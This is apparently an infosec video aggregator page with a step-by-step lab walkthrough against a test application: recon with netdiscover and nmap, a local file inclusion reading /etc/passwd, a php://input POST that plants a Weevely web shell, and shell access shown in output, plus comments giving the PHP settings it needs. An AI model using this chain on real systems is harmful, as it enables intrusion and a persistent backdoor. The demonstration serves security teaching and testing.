Description: From LFI to remote code excution with php://input POST request (super veda2012 test application) :
Tools:
Netdiscover
nmap
Burp Suite
Weevely tiny web shell
Firefox
Attacker ip addr : 192.168.42.130
netdiscover -r 192.168.42.0
nmap -sS -sV -p 80 192.168.42.132
firefox 192.168.42.132
192.168.42.132/pressreleases/showPressRelease.php?releaseID=/etc/passwd%00
open burp
Use repeater to post request :
POST /pressreleases/showPressRelease.php?releaseID=php://input%00 HTTP/1.1
Create php shell:
cd /pentest/web/backdoors/weevely/
./weevely.py generate mypass /var/www/shell.txt
Upload shell with burp post request:
POST /pressreleases/showPressRelease.php?releaseID=php://input%00 HTTP/1.1
Connecto to shell:
./weevely.py http://192.168.42.132/pressreleases/shell.php mypass
apache@localhost.localdomain:/var/www/html/pressreleases$ ls
1.php
2.php
3.php
default.php
index.php
shell.php
showPressRelease.php
thumbs
apache@localhost.localdomain:/var/www/html/pressreleases$
Tags: php weevely shell lfi nmap burp suite ,
Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.
Great video thanks for sharing... Excellent demonstration
Thanks a lot.
Are they any configuration requirements (I mean PHP or webserver configuration) besides of having script with LFI vulnerability to run the code from POST request using this php://input method ? I tried this on XAMPP, but it's somehow hardened.
So, I told to mysel try harder & now it's work.
It requires:
1. to set allow_url_include On in php.ini
2. on windows environment it will be php://input (without nullbyte, because with nullbyte it doesn't work).
cool thanx for the info and sorry for the late response.